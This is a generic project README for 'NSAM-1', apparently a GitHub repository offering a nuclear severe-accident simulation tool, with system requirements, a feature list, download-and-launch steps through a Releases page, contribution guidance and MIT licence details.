๐ NSAM-1 - Simulate Safety with Ease
๐ Getting Started
Welcome to NSAM-1. This software helps you understand how to detect early collapse in severe accidents and supports passive recovery during critical situations. Itโs designed for simulation, so no special training or technical skills are necessary.
๐ฅ Download NSAM-1

๐ System Requirements
Before you download NSAM-1, ensure your computer meets the following requirements:
- Operating System: Windows 10, macOS Big Sur, or later versions.
- CPU: Dual-core processor or better.
- RAM: 8 GB or more.
- Disk Space: At least 1 GB of free space available.
- Software Dependencies: Python 3.7 or newer, OpenFOAM version 7 or newer.
๐ฆ Features
- Early Collapse Detection: Identify potential failures before they become critical.
- Passive Recovery Mechanism: Automated response to severe accident scenarios.
- User-Friendly Interface: Navigate features without needing technical expertise.
- Extensive Documentation: Clear instructions will guide you through each function.
๐ Topics Covered
- Autonomous Systems
- Digital Twin Technology
- Nuclear Safety Practices
- Open Source Principles
- Simulation Techniques
- Symbolic Dynamics
๐ Download & Install
To download NSAM-1, please visit this page to download. Once youโre on the Releases page, follow these steps:
- On the Releases page, scroll to find the latest version.
- Click on the version number to expand the details.
- Look for the download options. Youโll typically see a file labeled something like โNSAM-1_v1.0.zipโ or similar.
- Click on the download link for the appropriate file.
- Wait for the file to finish downloading.
Once the download is complete, follow these steps to run the software:
- Locate the downloaded file on your computer.
- Unzip the file if itโs in a compressed format (e.g., .zip).
- Open the folder that contains the unzipped files.
- Look for a file named โlaunch.batโ or โrun.shโ depending on your operating system.
- Double-click this file to start the application.
โ๏ธ How to Use NSAM-1
Upon launching the application, you will be greeted with the main interface. Hereโs how to get started:
- Setup Your Environment: Enter the parameters for the simulation based on your needs.
- Conduct Simulations: Navigate through the user interface to set the scenarios. You can follow the prompts.
- Analyze Results: After the simulation, review the results displayed. The interface provides visual outputs to help interpret the data easily.
๐ก Tips for Best Experience
- Ensure your computer meets all the system requirements for optimal performance.
- Review the user manual available in the documentation section for detailed instructions.
- Join discussions in community forums to learn from other usersโ experiences and tips.
๐ค Contributing
We welcome contributions! If you want to help make NSAM-1 better, please follow these steps:
- Fork the repository to your account.
- Clone your forked version to your local machine.
- Make your changes, then commit and push them back to GitHub.
- Submit a pull request for review.
๐ License
NSAM-1 is open-source and released under the MIT License. You can freely use, modify, and share the software. Please see the LICENSE file for more details.
๐ Support
If you need help or have questions, please open an issue on GitHub. Our team will respond as soon as possible.
Thank you for using NSAM-1! We hope it enhances your understanding of severe accident simulations. Enjoy using the software!